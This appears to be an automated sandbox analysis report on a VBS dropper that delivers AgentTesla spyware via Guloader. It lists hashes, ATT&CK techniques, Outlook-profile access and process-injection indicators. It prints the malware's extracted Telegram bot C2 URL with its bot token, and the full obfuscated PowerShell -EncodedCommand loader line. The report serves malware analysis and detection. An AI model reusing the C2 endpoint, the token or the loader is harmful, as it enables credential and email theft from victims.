agenttesla | 1eade2198b604a51fbefd8ead5b2fa124d8ce1423a866d84023372a46d4d2fd9

General

Target

Order_00361122.vbs
Size

276KB
MD5

8c99576af66faeb6ddf4f7c3f433e714
SHA1

ca49af12f2a1ec4c0e4e887175014278a2d5970d
SHA256

1eade2198b604a51fbefd8ead5b2fa124d8ce1423a866d84023372a46d4d2fd9
SHA512

02096dd72ca236ee53d7314003553c1fcb5ecb24b1fab5e527aded8c59453284e02d4d88c70a9d6d0d2d55aa8647cfb7e402558d8b6967f8247d5784330dcf55
SSDEEP

6144:3cvv8qMvgfGi81kO/4qRHKHaz+OTnH2aBRBu8M:3c3ofLiqRRz+SHl36

Score

10^/10

agenttesla guloader collection downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot2130601984:AAFbq9oRuTM0trTEQbxU_lfoBZ4A2S2DeD8/sendDocument

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.execaspol.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

caspol.exe

pid process

1316 caspol.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.execaspol.exe

pid process

556 powershell.exe
1316 caspol.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 556 set thread context of 1316 556 powershell.exe caspol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.execaspol.exe

pid process

556 powershell.exe
1316 caspol.exe
1316 caspol.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

556 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.execaspol.exe

description pid process

Token: SeDebugPrivilege 556 powershell.exe
Token: SeDebugPrivilege 1316 caspol.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

caspol.exe

pid process

1316 caspol.exe

pid	process
1316	caspol.exe

pid	process
556	powershell.exe
1316	caspol.exe

description	pid	process	target process
PID 556 set thread context of 1316	556	powershell.exe	caspol.exe

pid	process
556	powershell.exe
1316	caspol.exe
1316	caspol.exe

pid	process
556	powershell.exe

description	pid	process
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	1316	caspol.exe

pid	process
1316	caspol.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 960 wrote to memory of 556	960	WScript.exe	powershell.exe
PID 960 wrote to memory of 556	960	WScript.exe	powershell.exe
PID 960 wrote to memory of 556	960	WScript.exe	powershell.exe
PID 960 wrote to memory of 556	960	WScript.exe	powershell.exe
PID 556 wrote to memory of 576	556	powershell.exe	csc.exe
PID 556 wrote to memory of 576	556	powershell.exe	csc.exe
PID 556 wrote to memory of 576	556	powershell.exe	csc.exe
PID 556 wrote to memory of 576	556	powershell.exe	csc.exe
PID 576 wrote to memory of 1804	576	csc.exe	cvtres.exe
PID 576 wrote to memory of 1804	576	csc.exe	cvtres.exe
PID 576 wrote to memory of 1804	576	csc.exe	cvtres.exe
PID 576 wrote to memory of 1804	576	csc.exe	cvtres.exe
PID 556 wrote to memory of 1316	556	powershell.exe	caspol.exe
PID 556 wrote to memory of 1316	556	powershell.exe	caspol.exe
PID 556 wrote to memory of 1316	556	powershell.exe	caspol.exe
PID 556 wrote to memory of 1316	556	powershell.exe	caspol.exe
PID 556 wrote to memory of 1316	556	powershell.exe	caspol.exe

outlook_office_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

outlook_win_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Order_00361122.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABMAGEAcABwAGUAbgBzAGYAaQAgAD0AIABAACcADQAKAEYAcgBkAGkAZwBBAEgAcwB0AHAAYQBkAFMAeQBtAGEAcwBkAEUAbgBtAGUAcwAtAFUAbABzAGUAbABUAEEAcgB0AG8AdAB5AGIAYQBuAGsAcgBwAEkAbgBmAHIAYQBlAFQAbwB0AGEAbAAgAFMAZwBlAG8AcAAtAFQAZQBtAHAAZQBUAHQAcgBrAHQAagB5AFQAcgBpAGMAaABwAEQAdQBuAHQAZQBlAE4AZQBkAGUAcgBEAEEAZwBlAG4AdABlAFMAdAByAGEAYQBmAEIAbABvAG8AZABpAFIAaQBwAGUAbgBuAHMAeQBsAGUAcwBpAEQAZQBsAHQAaQB0AEYAYQBuAHQAYQBpAEsAaABhAGQAaQBvAE0AaQBkAGQAZQBuAFAAYQByAGUAcwAgAFMAawBpAGYAZgBAAEcAcgBhAG4AZAAiAAoARgBlAHIAdABpAHUAUAByAGUAZABpAHMAUABvAGwAeQBtAGkAQwB1AHIAaQBvAG4AUwBrAHkAbgBkAGcAQwBvAHAAdABpACAAUwB0AHIAdQBrAFMAQQB0AG8AcAAgAHkAUAB5AGUAbABvAHMAQQB0AHQAZQBuAHQASAB5AGQAcgBvAGUAVQBuAGMAdQByAG0AUwBhAHIAdABvADsACgBiAHIAeQBnAGcAdQBUAG8AcgBwAGUAcwBPAHAAZQByAGEAaQBHAGUAcwB0AHUAbgBHAGkAZABzAGwAZwBCAGUAdgBnAGcAIABQAHIAZQBwAGUAUwBCAGUAbABhAGIAeQB1AG4AbQBlAGUAcwBSAGUAcwB1AHIAdABSAHkAdAB0AGUAZQBUAG8AbQBoAGoAbQBJAG4AdABlAHIALgBOAGUAdQB0AHIAUgBIAG8AcwB0AGEAdQBVAG4AZABlAHIAbgBWAGEAZwBhAGIAdABTAGgAbwB1AGwAaQBQAGEAdQBsAGkAbQBCAG8AcwBwAGgAZQBNAHkAZQBsAG8ALgBTAHUAYwBjAGUASQBPAHYAZQByAGQAbgBLAGwAZABlAGQAdABOAG8AbgBtAGEAZQBMAGYAdABuAGkAcgBTAGMAcgB1AHQAbwBBAGYAZwBhAHMAcABUAGUAdAByAGkAUwBwAGUAcgBlAG4AZQBCAGkAYwBlAHAAcgBMAG8AdAB0AGEAdgBQAGEAaQBuAGsAaQBQAHIAbwBiAGwAYwBTAHUAcABlAHIAZQBOAGEAdABpAG8AcwBVAGQAdgBlAGsAOwAKAEMAaABlAGMAawBwAEMAbABlAGEAdgB1AFIAZQBjAGgAZQBiAHUAbgBjAG8AbgBsAFMAaQBzAHMAaQBpAEoAZwBlAHIAbgBjAFYAaQByAGsAcwAgAFMAdABpAG4AawBzAFMAdQBiAGEAdAB0AEEAbQBwAGgAaQBhAFMAaQBiAGkAbAB0AFUAbgBvAHYAZQBpAEwAYQBuAHQAaABjAFMAbABpAGsAbQAgAEcAdQBzAHMAZQBjAEEAdQB0AG8AbQBsAFAAbABhAHMAdABhAFMAdQBwAGUAcgBzAE8AZQBrAG8AbgBzAEsAdgBhAGQAcgAgAFQAbwBpAGwAZQBFAFQAaQBnAGgAdABuAFQAYQBiAG8AdQB0AEYAbwByAGIAcgB3AHAAcgBvAGQAdQBpAEEAdAByAGUAcwAxAAoAVABhAHgAYQBlAHsAVAByAHkAawBtAFsAQQB1AHQAbwBvAEQAVAByAHkAcABzAGwAQgBpAHIAYwBoAGwARABvAGsAYgBhAEkAUwBlAHAAdABpAG0AVQBuAGQAbABpAHAAUwBhAGIAYgBhAG8ARABhAHQAYQBrAHIAQgBsAHUAcwBuAHQASQBuAGQAZQBrACgAYwBvAG8AcABlACIAUgBsAGkAZwBzAGcATABlAHAAdABvAGQATgBhAHQAdQByAGkARgBsAG8AZABoADMATQBvAHIAZwBlADIAQgBvAGQAawBpACIAUwBwAGkAZABzACkARgBvAHIAbQB1AF0ATgBvAG4AaQBuAHAARABlAHMAbQBhAHUARgByAG8AcwB0AGIAUwB0AHIAYQB0AGwAUAByAG8AdABvAGkARgBvAGIAaQBlAGMAUQB1AGEAZAByACAAQgBsAGsAawBsAHMAUwB1AG4AbABhAHQAUgBlAHQAcwByAGEARABlAGwAbwBtAHQAUABuAGUAdQBtAGkATQB1AG4AbQByAGMATQBhAHQAdABvACAAUABvAHQAYQBtAGUAUwBoAGUAcgBhAHgARABvAG4AcwB5AHQAdABhAGwAZQBsAGUAaQBuAGQAcwBuAHIATgBlAHcAcABvAG4AQgBlAGQAZQBzACAATABpAG8AdAByAGkAUABlAHIAaQBkAG4AUABhAHMAdAByAHQASABhAGwAdgBsACAASQBuAHQAZQByAEUAUABhAHQAZQByAG4AQgBlAHMAcgBnAHUAQgB5AGQAcgBlAG0ASQByAHIAZQBtAEYAdAByAGkAbwBuAG8ATwBhAGQAYQBsAG4ATABpAGcAbgBvAHQARABpAHMAbQBhAHMAVQBuAHUAcwB1ACgAVwBoAGUAbgBjAGkAVQBuAGQAdgByAG4AUwBrAGEAZgB0AHQAUgBlAGMAbwBtACAARQBmAHQAZQByAFUAQQBtAGkAYQBuAGQATgBhAGsAcwBrAGUATgBlAGQAZgByAG4AUwBhAG0AYQByAHIAQQB1AGcAbQBlACwAUAByAGkAbgBjAGkAQwBlAG4AcwB1AG4ATgBlAGIAZQBuAHQAQwBhAHIAcgBvACAAUwBpAG0AdQBsAEkAQQBnAGEAcABlAG4AUwBvAHIAZABpAGcATQBvAHIAZgBhAGUAUwBsAHMAZQByAG4ASQBuAGgAYQBiAGkAYgBsAGkAbgBrACwARgBsAGUAbgBzAGkAVgBzAGUAbgBzAG4ARwB1AGUAbABmAHQAVgByAGQAaQBvACAASABlAGwAYgByAEMARQB0AGUAcgBuAG8AUwB3AGUAZQB0AGkAQgBhAG4AcQB1AG4AVABhAGcAcgBlACwAQQBmAHYAcgBnAGkAZABlAHIAbwBwAG4ARgBvAHIAawB1AHQATQB1AG4AZABoACAATwBtAHYAZQBuAG4AQgBsAHUAZQBkAG8AYgBhAG4AawBvAG4ARABvAHcAZABpAG8ARwBsAHkAcAB0AGQARgBlAG0AdABlACkAQwB1AGMAdQBsADsACgBzAGsAaQBiAHMAWwBBAG0AbQBvAG4ARABGAGkAagBpAHMAbABMAG8AdgBnAGkAbABKAG8AdQByAG4ASQBVAG4AZAByAG8AbQBBAGMAZQBkAGkAcABDAG8AbgB0AHIAbwBSAGUAbgBzAGQAcgBVAG4AaABhAG4AdABTAGUAbQBpAHAAKABTAHQAZQBkAHMAIgBEAG8AYwB0AHIAdQBVAGQAcwBwAGkAcwBSAHUAcwBzAG8AZQBXAGEAcgBuAGkAcgBSAGUAdgBhAGwAMwBQAHIAbwBkAHUAMgBOAG8AZABpAGYAIgBHAGkAZgBsAGUAKQBDAGUAbABvAHQAXQBBAHIAYgBlAGoAcABCAHIAdQBuAGUAdQBQAGkAZQByAG8AYgB2AGUAcgBzAGkAbABSAGUAbgBzAGQAaQBEAGkAcwBvAGIAYwBCAGwAZQBoAGEAIABTAG0AdQBkAHMAcwBCAGwAYQBrAGUAdABUAHIAbwBuAHMAYQBVAGQAYgByAG4AdABQAGUAcgBzAGUAaQBOAHIAZQBuAGQAYwBMAGEAbQBpAG4AIABBAGYAaABvAHIAZQBSAGEAYQBkAGkAeABSAGUAbgB0AGUAdABNAGEAZABwAGEAZQBLAHIAYgBsAGkAcgBLAGkAbgBlAHAAbgBDAG8AbgBzAGMAIABNAGEAZwBpAHMAaQBHAGUAcgBhAGUAbgBJAGIAcgBuAGQAdABVAG4AbABhAGQAIABCAHUAcgBnAGcARwBVAG4AZABlAHMAZQBzAGMAYQBuAGQAdABCAGUAZgBhAHYAVQBCAGkAZABzAGEAcABGAGwAaQBjAGsAZABEAGUAZwBhAHMAYQBCAHIAbwBtAHUAdABQAGgAbwB0AG8AZQBBAGYAaABvAGwAUgBDAGEAYwBvAGMAZwBzAGUAZQBjAGEAbgBTAHAAaQByAG8AKABQAGEAbgBsAG8AaQBVAG4AcwB1AGIAbgBPAGYAZgBlAHIAdABzAGkAcgB1AGUAIABGAHUAawBzAHMAVABTAHcAZQBlAHAAcgBQAGgAbwBzAHAAaQBSAGEAcABzAGMAcABhAHAAcAByAGUALABNAGkAcwBsAGUAaQBDAGEAcwBhAHMAbgBSAGEAcABzAG8AdABOAGUAcABhAGwAIABOAGkAYwBoAGkAQgBQAGEAcgByAHkAYQBVAHIAYgBhAG4AcgBGAGEAcwB0AGwAbgBUAHIAdQB4AGkAYQBGAGEAawB1AGwALABQAHIAbwB2AGUAaQBHAGEAcwB0AHIAbgBVAG4AcgBlAGQAdABSAGUAbQBpAHMAIABVAG4AYwBvAG4ASABWAGEAbABsAGUAbwBLAHIAcwBlAGwAcwBZAGEAYwBoAHQAcABiAHUAbABsAHcAKQBPAGQAbwBuAHQAOwAKAEIAaQBvAHQAZQBbAFMAcABsAGkAbgBEAFIAZQB0AHIAdABsAFAAbABvAHUAZwBsAFAAcgBlAHIAZQBJAGQAaQBvAHAAdABtAFMAYQBkAGQAZQBwAE0AbwBuAG4AaQBvAEEAawB0AHIAZQByAFYAYQBsAGcAawB0AEUAbgB0AHIAZQAoAFAAbwBzAHQAYwAiAE4AeQBkAGUAbgB1AFAAbgBzAGsAZQBzAEEAbABkAGUAcgBlAFYAZQBsAHYAZQByAEgAZQByAG0AYQAzAE0AbwBqAG8AcwAyAFMAbgBhAGUAdgAiAEIAZQBnAHIAdQApAFQAaQB0AGEAbgBdAFAAcgBlAHMAcwBwAGgAZQB0AGUAcgB1AFMAZwBlAHAAcgBiAFAAbwBtAG0AZQBsAFMAbgBvAGcAIABpAE4AZQBjAGUAcwBjAEcAcgBlAGIAbgAgAEIAcgBpAG4AZwBzAFIAbwBxAHUAZQB0AFMAZQBrAHMAdQBhAFMAaQBnAG4AYQB0AEMAYQBsAGEAbQBpAEcAZQByAGgAYQBjAE8AdQB0AHQAbwAgAGYAagBlAGwAZABlAE4AbwBuAHAAdQB4AEwAYQBtAGUAYgB0AEgAeQBwAGUAcgBlAFMAZQB2AGkAZwByAGEAbgBuAGUAeABuAFQAcgBhAGMAdAAgAEsAdQByAHYAZQBpAE0AbwBlAG4AdABuAFIAaABlAGkAbgB0AGEAbgBvAHAAbAAgAE0AYQBuAHUAZgBMAEQAdQBlAGwAbABvAEQAaQBzAGUAdQBvAEwAbwBuAGcAdQBrAEIAaQByAGsAZQB1AEMAcgB1AHMAaABwAEMAYQBsAG8AcgBJAEcAcwB0AGUAbwBjAHMAdQBzAHAAaQBvAEwAaQBiAGUAcgBuAFIAYQB2AGUAbABJAFQAcgBrAHAAcgBkAE0AZQBuAHQAZQBGAEYAbwByAGgAYQByAEIAbwB3AGUAcgBvAEYAcgBlAG0AbQBtAEcAeQByAG8AYwBEAFMAbABpAG0AZQBpAEgAagByAG4AZQByAEQAZQBwAHIAZQBlAHAAcgBvAHYAbwBjAE0AaQBtAG8AcwB0AE4AbwB0AGUAdwBvAEsAbgBpAHAAbAByAEsAdQBsAHQAdQB5AFQAaAB1AHIAcgAoAE8AbwBwAGgAeQBpAEIAZQBqAGEAZQBuAE4AbwBuAGMAYQB0AEEAZgBzAHAAbgAgAFMAaQBuAG4AaQBLAEMAeQBjAGwAbwBhAEkAbgBzAGUAbQBpAEYAbwByAHMAdgByAEEAdQB0AG8AcgBlAEIAZQBkAHUAbQB0AFMAawBpAGwAbAAsAHAAYQBsAGUAbwBpAFMAaQBuAGUAYwBuAFcAcgBhAGkAdAB0AE0AbwBuAGUAcgAgAFAAaABhAG4AdABLAEkAbQBwAGwAYQBsAHUAbgBkAGUAcgBhAGoAbwBiAG4AYQB0AHMAdABhAHIAdAB0AFMAawBpAHAAdAApAEMAeQB0AG8AawA7AAoAcAByAG8AbABvAFsARQBuAHYAbwB5AEQATwBwAHAAbwByAGwATQBpAG4AaQBzAGwARABpAHMAYwBvAEkARwB5AG4AZQBjAG0AbgBlAGQAcwBhAHAAQgByAG4AZQBwAG8AUwB1AGIAbwBwAHIAUwBlAGwAZQB1AHQAQQBiAGIAYQBzACgATwB2AGUAcgB3ACIATQBvAG4AbwBsAGsAQQBhAGsAZQAgAGUAVwBvAG8AbABnAHIAQQBlAGMAaQBkAG4AVQBuAGgAaQBlAGUASQBuAGQAbABlAGwARABlAHAAaQBsADMARABhAG0AbgBpADIAQgByAG4AZQB0ACIAVAByAGkAYgB1ACkAQwBsAGkAZgBmAF0AZABlAHMAaQBnAHAASwB2AGEAbAB0AHUARABpAGwAZQB0AGIATgBlAHMAdABhAGwAVQBkAHMAYQBuAGkAUABlAG4AZABlAGMAZwBlAHMAagBmACAASgB1AGQAZwBlAHMARQBtAGEAbABqAHQARQB4AHQAcgBhAGEAQQByAHIAYQBpAHQARgBvAHIAdgBpAGkAVwBhAGcAZwBpAGMARwB5AG4AZQBjACAATQBlAHIAYwB1AGUATwBtAG8AcABsAHgATQBlAHIAaQBkAHQAUwB1AGIAcABsAGUARwByAGEAZABhAHIATgBvAG4AYQBkAG4ARQBmAHQAZQByACAATwB1AHQAcwB0AGkAQQBuAHQAaQBjAG4AUAByAG8AZwByAHQARwBsAGEAbQBvACAAQwByAGUAYQB0AFYAVgByAHYAbABlAGkAbQBvAHUAbgB0AHIAUAByAGkAbwByAHQATQB1AGQAZABlAHUAQgBhAG8AYgBhAGEATgBhAHYAbgBlAGwAVABpAGwAdAByAEEAVQBkAHMAawBpAGwAVABvAGsAbwBtAGwAQQB0AHIAZQBwAG8AQQBpAHYAcgAgAGMARgByAGkAYQBmACgASQBuAHQAZQBsAGkAcABlAHIAcwBvAG4AQgBlAHYAbwBnAHQASQBuAGQAZwByACAAVgBhAG4AZABlAHYAUAB1AHIAYwBoADEARAByAGEAbgBrACwARQByAGgAdgBlAGkAUwB1AG4AZABhAG4AUABhAHQAZQB0AHQAYQByAGIAZQBqACAARABpAGEAbABlAHYASwBuAGEAcABzADIASAB5AHAAbwBzACwAdABpAGwAZgByAGkAVgBpAG8AbABlAG4ATgBvAHIAaQBlAHQAQwBvAHIAbwBsACAAUgBlAHMAZQByAHYAQgByAG4AZABlADMAVQBuAGQAZQByACwAUwBqAGIAZQByAGkAZQBwAGkAZABlAG4ARABlAGwAZgB1AHQAUABsAGkAZwB0ACAAcwB5AHMAdABlAHYAVABvAHAAcABvADQAdwBhAGcAZQBwACkAUwB5AHIAbgBlADsACgBTAHUAYgBlAHIAWwByAGUAZwBpAHMARABNAHUAbAB0AGkAbABGAGwAaQBkAGQAbABTAHcAYQBzAGgASQBTAHUAbgBkAGgAbQBiAHIAcwBuAHkAcABGAG8AcgB0AHkAbwBCAGUAdABqAGUAcgBVAG4AZABlAHIAdABIAG8AdgBlAGQAKABIAGUAawBzAGEAIgBUAGUAcwB0AGEAdQBTAGIAZQBmAGEAcwBSAGUAZgBvAHIAZQBCAGUAbgBkAGkAcgBCAHUAdABpAGsAMwBVAG4AbQBhAGMAMgBCAGwAbwBrAHQAIgBBAHUAdABvAGMAKQBUAGEAZQBsAGwAXQBGAGUAcgBzAGsAcABTAGsAdQBtAHIAdQBTAGsAYQBtAGwAYgBTAGUAbQBwAGkAbABCAGUAbgB6AGkAaQBMAGEAdgB0AHIAYwBBAGYAdgBpAGsAIABBAGMAaABlAHIAcwBUAGkAbABzAHYAdABNAGEAbgB0AGkAYQBlAGcAZQBuAGMAdABUAHYAaQBuAGQAaQBFAG0AZABlAG4AYwBBAGwAYQByAG0AIABTAHAAcgBuAGcAZQBEAG8AbgBlAHMAeABCAGUAZgBzAHQAdABTAHUAYgBkAG8AZQBQAGkAbgBuAGUAcgBGAHoAIABDAGgAbgBQAGwAYQBzAG0AIABTAHAAbABlAGoAaQB0AGkAbgBzAG8AbgBTAGEAbgBpAHQAdABKAGUAcgBuAGIAIABCAGwAcwBlAGIARABLAGEAbQBlAHIAZABNAG8AdQBzAHMAZQBGAGEAcgBvAGUARgBSAGUAdABzAGgAcgBBAGQAdgBpAHMAZQBBAGcAcgBlAHMAZQBSAGUAYwBlAHMAUwBTAGUAcQB1AGEAdABJAG4AZAB1AHMAcgBVAGQAcwBsAHkAaQBLAGEAcABpAHQAbgBPAHAAcwBwAGwAZwBCAGkAbgBnAG8ASABQAHIAZQBmAHIAYQBTAHUAYgBjAGwAbgBOAG8AcgBkAGwAZABSAGUAcwB1AHIAbABQAGwAdQBtAHUAZQBkAGEAdABhAHIAKABUAHIAaQBsAGwAaQBWAGEAcwBrAGUAbgBVAG4AbQBpAHMAdABtAG8AbgBvAGUAIABPAG0AawBvAHMAZABPAHUAdABzAHAAaQBUAGgAZQByAGsAYQBUAGUAYQBtAGUALABVAG4AZABlAHIAaQBiAHIAbgBkAGUAbgBQAG8AbABhAHIAdABTAGsAdQBkAHMAIABPAG0AYgB5AHQATABoAGUAawBzAGUAZQBTAHEAdQBlAGEAdgBTAGsAaQBmAHQAZQBKAGEAdgBlAGwAbgBCAGEAbABsAG8AKQBxAHUAIABzAHAAOwAKAE0AYQBnAGUAIABbAFMAaQBuAG8AcgBEAFUAZAByAGEAbgBsAE0AYQBhAGQAZQBsAFAAcgBlAG8AZgBJAFAAYQBsAGEAdABtAEgAdgBuACAARQBwAFMAbwByAHQAaQBvAEMAaQByAGMAdQByAFQAZQBsAGUAcgB0AEYAZQBzAHQAbQAoAFIAZQBhAHAAcAAiAEgAdQBzAGIAYQBtAEgAZQByAG8AaQBwAEUAZgB0AGUAcgByAHAAcwB5AGMAaAAuAEIAbABhAGQAawBkAEIAcgB1AGcAcwBsAEcAYQBsAGEAcgBsAEgAdQBnAHUAZQAiAFIAYQBkAGsAbgApAEQAaQByAHQAYgBdAGYAcgB1AGMAdABwAEQAZABtAGEAbgB1AEUAcgBoAHYAZQBiAHQAaQBsAGgAbgBsAFMAawBvAHMAcABpAE4AbwBuAGYAbwBjAFAAZQBuAG4AYQAgAEYAbwBsAGsAZQBzAEcAYQBzAHMAaQB0AGgAZQB4AGEAcABhAE0AYQByAHMAaAB0AEUAbgBjAGwAbwBpAFAAcgBvAHQAZQBjAEIAaQByAGwAaQAgAFMAdABhAHQAdQBlAFUAcwB5AG4AbAB4AEYAbAB1AG4AawB0AEsAYQB0AGoAYQBlAEMAYQBtAGUAcgByAFMAYQBiAGIAYQBuAEQAZQBjAGEAeQAgAHAAbABlAGoAZQBpAFMAZQBhAG0AbABuAEoAbwB1AHIAbgB0AFQAcgBvAG0AbQAgAE0AbwBvAG4AZQBXAFMAYQBtAG0AZQBOAFIAZQBsAGkAZQBlAFMAZQBsAHYAbQB0AE4AbwB0AGEAcgBDAEQAaQBzAGYAYQBsAEQAZQBmAGUAbgBvAEEAaQByAGIAbwBzAEMAbwBzAHQAZQBlAE0AaQBsAGkAdABFAFQAYQBnAGQAawBuAEwAbwBiAGEAbAB1AEkAbgBkAGsAYQBtAEMAZQBuAG8AZwAoAFMAdQBjAGMAZQBpAFQAcgBpAHQAbwBuAEMAYQBsAG8AcgB0AEMAaABhAHAAYQAgAFAAYQByAHQAcgBCAE4AbwB2AGUAbAB2AFYAYQByAG0AZQByAFMAawBhAG4AZABlAFUAbgBkAGUAbgAxAE8AcgBkAHIAZQAyAEMAbwBvAGwAaAA0AE0AZQB0AGEAcAApAEcAZwBlAGQAYQA7AAoAQwBoAGEAcgBsAFsAQgBsAG8AZABkAEQASABhAGwAZQBzAGwAdAByAG8AdQBiAGwAUABpAGwAbwB0AEkAUgBlAGcAcgBlAG0ARgBhAGcAbwBtAHAAQgBpAGwAbABlAG8AUgBlAHAAcgBlAHIATQBlAGoAcwBsAHQASwBvAG0AbQB1ACgAUwB3AGkAZgB0ACIAQQB0AHQAcgBpAGsARwBsAHUAYwBrAGUATQB1AGwAaQBnAHIAQwBoAGkAYwBxAG4ATwBwAHMAcAByAGUARgByAHMAdABlAGwASABpAHIAZABzADMAUwBtAGUAbAB0ADIARgBhAGcAdABpACIAVABhAGoAZwBhACkAYgBhAHMAdABpAF0ASQByAHIAZQBjAHAAQQBuAGEAcABsAHUARgBvAHIAawB0AGIAQgBlAGEAbgBlAGwATQB1AHMAawBlAGkAUABvAHMAdABhAGMAVwBpAGwAZAB3ACAASABvAGIAbwBzAHMAUgBlAG0AZQB4AHQAUwB0AGEAYQBsAGEAQQB3AGEAcgBlAHQATQBpAGUAawBlAGkAQgBpAHUAbgBpAGMARgByAGUAZwBuACAATgBpAGQAZABpAGUAQgBpAG8AZQBuAHgAUwB2AGUAcgBpAHQAQgBlAHMAbABhAGUAUgBhAHYAZwBhAHIAQwBoAGEAcgBsAG4AQgBlAGIAcgBlACAARgBpAGYAdAB5AHYAQgBsAHUAcgByAG8ARABlAHMAZQByAGkARABvAHMAZQByAGQAQQBuAHMAZQB0ACAAUgBhAGMAaABpAEkASQBuAGYAbAB1AG4AUABzAHkAYwBoAGkARwB1AGQAcwB0AHQAQQBuAHQAaQBzAGkARAB5AGsAbgBkAGEAVAB2AGEAbgBnAGwAQQB1AHQAbwBlAGkAZQBqAGUAcgBzAHoATABlAG8AbgBhAGUAUwB0AGEAbgBnAEMASABlAHAAYQByAHIASABhAHcAawBiAGkARABhAGcAcABlAHQAVQBuAGIAbABpAGkATwB2AGUAcgBzAGMAUABlAGQAaQBwAGEAVwBoAGkAbgB5AGwAUwB0AHMAbABhAFMAUgBhAHYAZQBsAGUAUwB0AGkAbABsAGMARABlAHMAZQByAHQAZwBpAG0AbQBpAGkAQwBvAG0AcAB1AG8ARQByAGgAdgBlAG4AbABvAHYAZgBvACgAdABlAG4AYQAgAGkATAB1AGsAawBlAG4AcwBrAG8AdgBsAHQAVABlAGUAdABoACAAVABqAGUAbgBzAE0AUgBhAGYAdABlAGkASABvAHAAcABlAGwAVAB5AGYAbwBuACkAQwBsAGUAaQBzADsACgByAGUAdABhAHIAWwBBAGEAcgBzAG8ARABaAHUAbgBpACAAbABTAHQAbgBrAGUAbABCAG8AcgB0AGYASQBGAGEAcwBlAHIAbQBIAGYAdABlAHMAcABBAGMAYwB1AHMAbwBQAGEAdAByAG8AcgBLAG8AbgBzAGUAdABDAGgAYQBzAGUAKABNAHUAcwBpAGsAIgBHAHIAdQB0AHQAawBTAHQAaQBrACAAZQBrAGUAdAB1AHAAcgBTAGwAdgB2AHIAbgBHAHIAZQB2AGkAZQBMAGUAbgBhACAAbABTAHQAaQBsAGUAMwBoAG8AbQBpAG4AMgBUAGEAcABpAG4AIgBaAGEAbgBpAGEAKQBXAGkAdABoAGUAXQBPAG4AeQBtAGEAcABSAHUAbQBmAGEAdQBEAGkAcABoAGEAYgBNAGUAcgBjAGUAbABGAGkAcwBrAGUAaQBCAGwAZQBhAGsAYwBGAG8AcgBoAGEAIABzAG0AYQByAHQAcwBHAGEAbAB2AGEAdABQAGEAbgB0AG8AYQBEAGUAbQBpAGwAdABLAG8AbQBtAGEAaQBCAGUAdAByAG8AYwBHAGUAaAByAHMAIABFAHkAZQBzAHAAZQBTAGUAawByAGUAeABDAG8AbABhACAAdABUAGUAbABlAGYAZQBTAHQAZQBuAHQAcgBCAG8AZwBzACAAbgBGAG8AcgBzAHQAIABLAHYAYQBkAHIASQBDAHkAYwBsAG8AbgBSAHUAZgBmAGUAdABmAG8AcgBmAGkAUABDAGEAbABsAG8AdABNAGkAcwBhAGQAcgBTAG8AcgB0AGkAIABHAHIAaQBsAG4ARQBTAGgAaQBwAHAAbgBzAHQAbwBkAGcAdQBNAGUAdABhAHIAbQBhAG4AbgBhAGwAUwBNAGUAdABhAGwAeQBQAGwAYQBkAHMAcwBFAHQAYgByAHIAdABCAHIAdQBnAGUAZQBUAGkAbABmAG8AbQBEAGkAcwBhAHAATABzAG4AZABhAGcAbwBDAG8AbgBjAHUAYwBDAGgAYQBtAHAAYQB1AG4AYQBuAGcAbABVAG4AbABhAGIAZQBQAGkAawBlACAAcwBOAGUAdwB6AGUAQQBNAGEAcgBnAGkAKABQAHMAZQB1AGQAdQBDAHkAdABvAHAAaQBrAGEAcgB5AGEAbgBSAHUAbgBkAG4AdABDAG8AdQBuAHQAIABCAHIAZQBhAHMAdgBzAGUAZwBuAGUAMQ